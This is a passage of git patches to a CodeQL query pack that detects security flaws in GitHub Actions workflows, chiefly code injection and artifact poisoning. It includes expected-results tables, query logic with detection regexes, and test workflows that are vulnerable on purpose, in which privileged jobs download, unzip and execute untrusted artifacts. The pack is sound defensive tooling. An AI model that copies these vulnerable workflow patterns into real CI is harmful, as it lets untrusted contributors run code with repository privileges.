.github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | -| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | -| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | ${{ github.head_ref }} | -| .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | ${{ github.event.commits[11].message }} | -| .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | ${{ github.event.commits[11].author.email }} | -| .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | ${{ github.event.commits[11].author.name }} | -| .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | -| .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | ${{ github.event.head_commit.author.email }} | -| .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | ${{ github.event.head_commit.author.name }} | -| .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | ${{ github.event.head_commit.committer.email }} | -| .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | ${{ github.event.head_commit.committer.name }} | -| .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | ${{ github.event.commits[11].committer.email }} | -| .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | -| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | ${{ steps.source.outputs.value }} | -| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | -| .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | -| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | -| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | -| .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | ${{ env.ISSUE_KEY }} | -| .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | -| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | -| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | -| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | -| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | -| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | ${{ github.event.workflow_run.head_commit.committer.email }} | -| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | ${{ github.event.workflow_run.head_commit.committer.name }} | -| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | ${{ github.event.workflow_run.head_repository.description }} | | action1/action.yml:14:19:14:50 | github.event.comment.body | action1/action.yml:14:19:14:50 | github.event.comment.body | action1/action.yml:14:19:14:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | action1/action.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | From f7ddd8b769f64dc375ad140d8f137e3ea3ea822a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 3 Apr 2024 15:39:50 +0200 Subject: [PATCH 0146/1267] Include problem queries in actions-all suite --- ql/src/codeql-suites/actions-all.qls | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/ql/src/codeql-suites/actions-all.qls b/ql/src/codeql-suites/actions-all.qls index 8c0f580a7ad..32b9b5800cd 100644 --- a/ql/src/codeql-suites/actions-all.qls +++ b/ql/src/codeql-suites/actions-all.qls @@ -2,4 +2,5 @@ - queries: . - include: kind: - - path-problem + - problem + - path-problem From ce5928c6bac0a49e245ff88503bb37612909bd16 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 3 Apr 2024 15:43:43 +0200 Subject: [PATCH 0147/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index e99a12dda08..f689f38ef52 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.5 +version: 0.0.6 dependencies: codeql/controlflow: "*" codeql/dataflow: "*" diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index e37339e16cb..f2ce850e5b8 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.5 +version: 0.0.6 groups: - actions - queries From 28ccf4fa68ffb178976a679c7ca62f2fee3b2305 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 5 Apr 2024 09:18:01 +0200 Subject: [PATCH 0148/1267] Improve Artifact Poisoning query --- ql/lib/codeql/actions/Ast.qll | 2 + ql/lib/codeql/actions/ast/internal/Ast.qll | 9 + .../security/ArtifactPoisoningQuery.qll | 183 ++++++++++++++++-- .../actions/security/EnvVarInjectionQuery.qll | 4 +- ql/src/Security/CWE-829/ArtifactPoisoning.ql | 13 +- ql/test/library-tests/test.expected | 4 + .../.github/workflows/artifactpoisoning11.yml | 41 ++++ ...poisoning1.yml => artifactpoisoning12.yml} | 10 +- ...poisoning3.yml => artifactpoisoning21.yml} | 10 +- ...poisoning2.yml => artifactpoisoning22.yml} | 2 +- .../.github/workflows/artifactpoisoning31.yml | 22 +++ .../.github/workflows/artifactpoisoning32.yml | 21 ++ .../.github/workflows/artifactpoisoning33.yml | 21 ++ .../.github/workflows/artifactpoisoning41.yml | 25 +++ ...poisoning4.yml => artifactpoisoning42.yml} | 4 +- .../.github/workflows/artifactpoisoning51.yml | 24 +++ .../CWE-829/ArtifactPoisoning.expected | 14 +- .../CWE-829/UnpinnedActionsTag.expected | 3 +- 18 files changed, 372 insertions(+), 40 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning11.yml rename ql/test/query-tests/Security/CWE-829/.github/workflows/{artifactpoisoning1.yml => artifactpoisoning12.yml} (73%) rename ql/test/query-tests/Security/CWE-829/.github/workflows/{artifactpoisoning3.yml => artifactpoisoning21.yml} (51%) rename ql/test/query-tests/Security/CWE-829/.github/workflows/{artifactpoisoning2.yml => artifactpoisoning22.yml} (94%) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning31.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning32.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning33.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning41.yml rename ql/test/query-tests/Security/CWE-829/.github/workflows/{artifactpoisoning4.yml => artifactpoisoning42.yml} (89%) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning51.yml diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 17768245fdc..720fd29feb0 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -225,6 +225,8 @@ class Step extends AstNode instanceof StepImpl { Env getEnv() { result = super.getEnv() } If getIf() { result = super.getIf() } + + Step getAFollowingStep() { result = super.getAFollowingStep() } } /** diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 3f9293bc972..bba5c1a47d3 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -629,6 +629,15 @@ class StepImpl extends AstNodeImpl, TStepNode { /** Gets the value of the `if` field in this step, if any. */ IfImpl getIf() { result.getNode() = n.lookup("if") } + + /** Gets a step that follows this step. */ + StepImpl getAFollowingStep() { + exists(LocalJobImpl job, int i, int j | + job.getStep(i) = this and + result = job.getStep(j) and + i < j + ) + } } class IfImpl extends AstNodeImpl, TIfNode { diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index abf36fd7da3..c64a7d0e338 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll @@ -1,13 +1,36 @@ import actions -class ArtifactDownloadStep extends Step { - ArtifactDownloadStep() { +string unzipRegexp() { result = ".*(unzip|tar)\\s+.*" } + +string unzipDirArgRegexp() { + result = "-d\\s+\"([^ ]+)\".*" or + result = "-d\\s+'([^ ]+)'.*" +} + +abstract class ArtifactDownloadStep extends Step { + abstract string getPath(); +} + +class Dawidd6ActionDownloadArtifactDownloadStep extends ArtifactDownloadStep, UsesStep { + Dawidd6ActionDownloadArtifactDownloadStep() { // eg: - uses: dawidd6/action-download-artifact@v2 - this.(UsesStep).getCallee() = "dawidd6/action-download-artifact" and - // exclude downloads outside the current directory - // TODO: add more checks to make sure the artifacts can be controlled - not exists(this.(UsesStep).getArgumentExpr("path")) - or + this.getCallee() = "dawidd6/action-download-artifact" and + // An attacker should not be able to push to local branches which `branch` normally is used for. + ( + not exists(this.getArgument("branch")) or + not this.getArgument("branch") = ["main", "master"] + ) + } + + override string getPath() { + if exists(this.getArgument("path")) then result = this.getArgument("path") else result = "" + } +} + +class ActionsGitHubScriptDownloadStep extends ArtifactDownloadStep, UsesStep { + string script; + + ActionsGitHubScriptDownloadStep() { // eg: // - uses: actions/github-script@v6 // with: @@ -26,16 +49,79 @@ class ArtifactDownloadStep extends Step { // artifact_id: matchArtifact.id, // archive_format: 'zip', // }); - this.(UsesStep).getCallee() = "actions/github-script" and - exists(string script | - this.(UsesStep).getArgument("script") = script and - script.matches("%listWorkflowRunArtifacts(%") and - script.matches("%downloadArtifact(%") + // var fs = require('fs'); + // fs.writeFileSync('${{github.workspace}}/test-results.zip', Buffer.from(download.data)); + this.getCallee() = "actions/github-script" and + this.getArgument("script") = script and + script.matches("%listWorkflowRunArtifacts(%") and + script.matches("%downloadArtifact(%") and + script.matches("%writeFileSync%") + } + + override string getPath() { + if + this.getAFollowingStep() + .(Run) + .getScript() + .splitAt("\n") + .regexpMatch(unzipRegexp() + unzipDirArgRegexp()) + then + result = + this.getAFollowingStep() + .(Run) + .getScript() + .splitAt("\n") + .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2) + else + if this.getAFollowingStep().(Run).getScript().splitAt("\n").regexpMatch(unzipRegexp()) + then result = "" + else none() + } +} + +class GHRunArtifactDownloadStep extends ArtifactDownloadStep, Run { + string script; + + GHRunArtifactDownloadStep() { + // eg: - run: gh run download ${{ github.event.workflow_run.id }} --repo "${GITHUB_REPOSITORY}" --name "artifact_name" + this.getScript() = script and + script.splitAt("\n").regexpMatch(".*gh\\s+run\\s+download.*") and + script.splitAt("\n").matches("%github.event.workflow_run.id%") and + ( + script.splitAt("\n").regexpMatch(unzipRegexp()) or + this.getAFollowingStep().(Run).getScript().splitAt("\n").regexpMatch(unzipRegexp()) ) - or - // eg: - run: gh run download "${WORKFLOW_RUN_ID}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" - this.(Run).getScript().splitAt("\n").regexpMatch(".*gh\\s+run\\s+download.*") - or + } + + override string getPath() { + if + this.getAFollowingStep() + .(Run) + .getScript() + .splitAt("\n") + .regexpMatch(unzipRegexp() + unzipDirArgRegexp()) or + script.splitAt("\n").regexpMatch(unzipRegexp() + unzipDirArgRegexp()) + then + result = script.splitAt("\n").regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2) or + result = + this.getAFollowingStep() + .(Run) + .getScript() + .splitAt("\n") + .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2) + else + if + this.getAFollowingStep().(Run).getScript().splitAt("\n").regexpMatch(unzipRegexp()) or + script.splitAt("\n").regexpMatch(unzipRegexp()) + then result = "" + else none() + } +} + +class DirectArtifactDownloadStep extends ArtifactDownloadStep, Run { + string script; + + DirectArtifactDownloadStep() { // eg: // run: | // artifacts_url=${{ github.event.workflow_run.artifacts_url }} @@ -45,6 +131,69 @@ class ArtifactDownloadStep extends Step { // gh api $url > "$name.zip" // unzip -d "$name" "$name.zip" // done - this.(Run).getScript().splitAt("\n").matches("%github.event.workflow_run.artifacts_url%") + this.getScript() = script and + script.splitAt("\n").matches("%github.event.workflow_run.artifacts_url%") and + ( + script.splitAt("\n").regexpMatch(unzipRegexp()) or + this.getAFollowingStep().(Run).getScript().splitAt("\n").regexpMatch(unzipRegexp()) + ) + } + + override string getPath() { + if + script.splitAt("\n").regexpMatch(unzipRegexp() + unzipDirArgRegexp()) or + this.getAFollowingStep() + .(Run) + .getScript() + .splitAt("\n") + .regexpMatch(unzipRegexp() + unzipDirArgRegexp()) + then + result = script.splitAt("\n").regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2) or + result = + this.getAFollowingStep() + .(Run) + .getScript() + .splitAt("\n") + .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2) + else result = "" } } + +abstract class PoisonableStep extends Step { } + +class CommandExecutionRunStep extends PoisonableStep, Run { + CommandExecutionRunStep() { + exists(ArtifactDownloadStep step | + step.getAFollowingStep() = this and + // Heuristic: + // Run step with a command starting with `./xxxx`, `sh xxxx`, `node xxxx`, ... + // eg: `./test.sh`, `sh test.sh`, `node test.js`, ... + this.getScript() + .trim() + .regexpMatch(".*(./|(node|python|ruby|sh)\\s+)" + step.getPath() + ".*") + ) + } +} + +predicate writeToGithubEnv(Run run, string key, string value) { + exists(string script, string line | + script = run.getScript() and + line = script.splitAt("\n") and + key = line.regexpCapture("echo\\s+(\")?([^=]+)\\s*=(.*)(\")?\\s*>>\\s*\\$GITHUB_ENV", 2) and + value = line.regexpCapture("echo\\s+(\")?([^=]+)\\s*=(.*)(\")?\\s*>>\\s*\\$GITHUB_ENV", 3) + ) +} + +class EnvVarInjectionRunStep extends PoisonableStep, Run { + EnvVarInjectionRunStep() { + exists(ArtifactDownloadStep step, string value | + step.getAFollowingStep() = this and + // Heuristic: + // Run step with env var definition based on file content. + // eg: `echo "sha=$(cat test-results/sha-number)" >> $GITHUB_ENV` + writeToGithubEnv(this, _, value) and + value.regexpMatch(".*cat\\s+.*") + ) + } +} +// TODO: Taint Step for output var definition based on file content. eg: `echo "sha=$(cat test-results/sha-number)" >> $GITHUB_OUTPUT` diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index 330920852c1..a6d7e1b3cca 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -8,8 +8,8 @@ predicate writeToGithubEnvSink(DataFlow::Node exprNode, string key, string value exists(Expression expr, Run run, string script, string line | script = run.getScript() and line = script.splitAt("\n") and - key = line.regexpCapture("echo\\s+([^=]+)\\s*=(.*)>>\\s*\\$GITHUB_ENV", 1) and - value = line.regexpCapture("echo\\s+([^=]+)\\s*=(.*)>>\\s*\\$GITHUB_ENV", 2) and + key = line.regexpCapture("echo\\s+(\")?([^=]+)\\s*=(.*)(\")?\\s*>>\\s*\\$GITHUB_ENV", 2) and + value = line.regexpCapture("echo\\s+(\")?([^=]+)\\s*=(.*)(\")?\\s*>>\\s*\\$GITHUB_ENV", 3) and expr = exprNode.asExpr() and run.getAnScriptExpr() = expr and value.indexOf(expr.getRawExpression()) > 0 diff --git a/ql/src/Security/CWE-829/ArtifactPoisoning.ql b/ql/src/Security/CWE-829/ArtifactPoisoning.ql index 5d38faa94df..bd9ec090f7f 100644 --- a/ql/src/Security/CWE-829/ArtifactPoisoning.ql +++ b/ql/src/Security/CWE-829/ArtifactPoisoning.ql @@ -14,13 +14,10 @@ import actions import codeql.actions.security.ArtifactPoisoningQuery -from LocalJob job, ArtifactDownloadStep download, Step run +from LocalJob job, ArtifactDownloadStep downloadStep, PoisonableStep step where + // Workflow is privileged job.getWorkflow().isPrivileged() and - (run instanceof Run or run instanceof UsesStep) and - exists(int i, int j | - job.getStep(i) = download and - job.getStep(j) = run and - i < j - ) -select download, "Potential artifact poisoning." + // Download step is followed by a step that may be poisoned by the download + downloadStep.getAFollowingStep() = step +select downloadStep, "Potential artifact poisoning." diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index a8a0414dd9f..ea353609e24 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected @@ -351,6 +351,10 @@ sources | tj-actions/changed-files | * | output.unknown_files | PR changed files | | tj-actions/changed-files | * | output.unmerged_files | PR changed files | | tj-actions/verify-changed-files | * | output.changed-files | PR changed files | +| trilom/file-changes-action | * | output.files | PR changed files | +| trilom/file-changes-action | * | output.files_added | PR changed files | +| trilom/file-changes-action | * | output.files_modified | PR changed files | +| trilom/file-changes-action | * | output.files_removed | PR changed files | | tzkhan/pr-update-action | * | output.headMatch | | | xt0rted/slash-command-action | * | output.command-arguments | | summaries diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning11.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning11.yml new file mode 100644 index 00000000000..f8d3736dba5 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning11.yml @@ -0,0 +1,41 @@ +name: Pull Request Open + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - uses: actions/github-script@v6 + with: + script: | + let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: context.payload.workflow_run.id, + }); + let matchArtifact = allArtifacts.data.artifacts.filter((artifact) => { + return artifact.name == "" + })[0]; + let download = await github.rest.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifact.id, + archive_format: 'zip', + }); + let fs = require('fs'); + fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/sonarcloud-data.zip`, Buffer.from(download.data)); + - name: Unzip + run: | + unzip sonarcloud-data.zip -d sonarcloud-data + ls -a sonarcloud-data + - name: Run command + run: + ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build + + + diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning1.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning12.yml similarity index 73% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning1.yml rename to ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning12.yml index 4755350f0fc..edcdc3b2064 100644 --- a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning1.yml +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning12.yml @@ -27,8 +27,14 @@ jobs: artifact_id: matchArtifact.id, archive_format: 'zip', }); + let fs = require('fs'); + fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/sonarcloud-data.zip`, Buffer.from(download.data)); + - name: Unzip + run: | + unzip sonarcloud-data.zip + ls -a sonarcloud-data - name: Run command - run: cmd - + run: + ./x.py build -j$(nproc) --compiler gcc --skip-build diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning3.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning21.yml similarity index 51% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning3.yml rename to ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning21.yml index 4d2a9774753..2f39bfd307a 100644 --- a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning3.yml +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning21.yml @@ -10,10 +10,14 @@ jobs: Download: runs-on: ubuntu-latest steps: - - run: | - gh run download "${WORKFLOW_RUN_ID}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" + - uses: dawidd6/action-download-artifact@v2 + with: + name: artifact_name + workflow: wf.yml + path: foo - name: Run command - run: cmd + run: | + ./foo/cmd diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning2.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning22.yml similarity index 94% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning2.yml rename to ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning22.yml index 725038ab816..31fa3017551 100644 --- a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning2.yml +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning22.yml @@ -15,7 +15,7 @@ jobs: name: artifact_name workflow: wf.yml - name: Run command - run: cmd + run: ./cmd diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning31.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning31.yml new file mode 100644 index 00000000000..0e7c6f97cf5 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning31.yml @@ -0,0 +1,22 @@ +name: Pull Request Open + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + 